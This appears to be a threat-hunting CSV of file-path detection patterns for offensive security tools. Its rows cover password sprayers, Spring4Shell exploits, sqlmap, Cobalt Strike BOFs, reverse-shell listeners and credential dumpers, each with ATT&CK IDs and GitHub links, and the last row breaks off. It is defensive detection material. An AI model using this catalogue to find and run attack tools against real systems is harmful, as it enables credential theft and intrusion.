+"*/spray/spray.py*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*/Spray365*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*/Spray-AD.*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*/SprayAD.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*/Spray-AD/*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*/sprayers/owa.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/sprayhound.git*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*/sprayhound/*.py*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*/spraying.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - 
TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/SprayingToolkit*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/SprayingToolkit.git*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/Spring4Shell-POC*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","1","N/A","N/A","4","335","106","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" +"*/Spring4Shell-POC*","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","1","N/A","N/A","4","303","229","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" +"*/SpringCore0day*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" +"*/spring-core-rce*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" +"*/Spring-CVE/*","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","13","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" +"*/SpringFramework_CVE-2022-22965_RCE*","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" +"*/springshell-rce-poc*","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","1","N/A","N/A","1","21","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" +"*/sql_inj.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/sqli.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/sqli/mssqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/mysqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/postgresqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/sqlitei*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/utils*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli_test.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*/sqlmap.zip*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" +"*/SQLRecon*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"*/sqrtZeroKnowledge/CVE-*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23398","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - 
TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" +"*/src/exploit.html.tpl*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" +"*/src/john.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/jumbo.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/jumbo.h*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/nysm.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/src/RecycledGate.h*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/src/Sleeper.cpp*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/src/unixshell.rs*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/srdi-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/ssh2-enum-algos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-auth-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-hostkey.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-publickey-acceptance.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-run.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sshv1.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-ccs-injection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-cert.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-cert-intaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-date.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-dh-params.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-enum-ciphers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-heartbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-known-key.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-poodle.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sslv2.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sslv2-drown.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssp/decryptor.py","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/SspiUacBypass.git*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*/ssploit/*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*/SSRFmap*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation 
